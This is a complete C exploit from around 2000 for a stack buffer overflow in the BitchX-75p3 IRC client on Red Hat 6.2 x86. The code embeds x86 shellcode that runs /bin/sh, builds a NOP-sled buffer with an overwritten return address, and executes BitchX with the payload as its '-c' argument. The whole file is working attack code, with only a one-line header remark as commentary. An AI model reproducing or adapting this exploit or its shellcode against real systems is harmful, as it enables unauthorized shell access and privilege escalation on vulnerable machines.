/****************************************************************************/
/* BitchX-75p3 exploit, Redhat 6.2 x86, by flea <flea@netc.pt>        [2000]*/
/*                                                                    [2000]*/
/*  Yet another example of bad coding.                                [2000]*/
/****************************************************************************/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

#define         NOP             0x90
#define         DEFAULT_ADDR    0xbffffc6c
#define         BSIZE           2060

unsigned long get_sp() {
  __asm__("movl %esp, %eax");
}

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

main ( int argc, char *argv[]) {
  char buffer[BSIZE];
  long address;

  if (argc == 1) {
    printf("BitchX-75p3 exploit, Redhat 6.2 x86, by flea\n");
    printf("usage: %s <offset>\n", argv[0]);
    printf("offset = 0, address=0x%x\n",DEFAULT_ADDR);
    exit(0);
  }

  if ( strcmp(argv[1], "0") == 0) 
    address = DEFAULT_ADDR;
  else
    address = get_sp() - atoi(argv[1]);

  /* builds our buffer */

  printf("Using address = 0x%x\n", address);
  memset(buffer, NOP, BSIZE);

  memcpy(buffer+(BSIZE-4-strlen(shellcode)), shellcode, strlen(shellcode));
  *(long *) &buffer[BSIZE-4] = address;

  execl("/usr/local/bin/BitchX","BitchX" ,"-c", buffer, 0);
}
/*                    www.hack.co.za           [21 July 2000]*/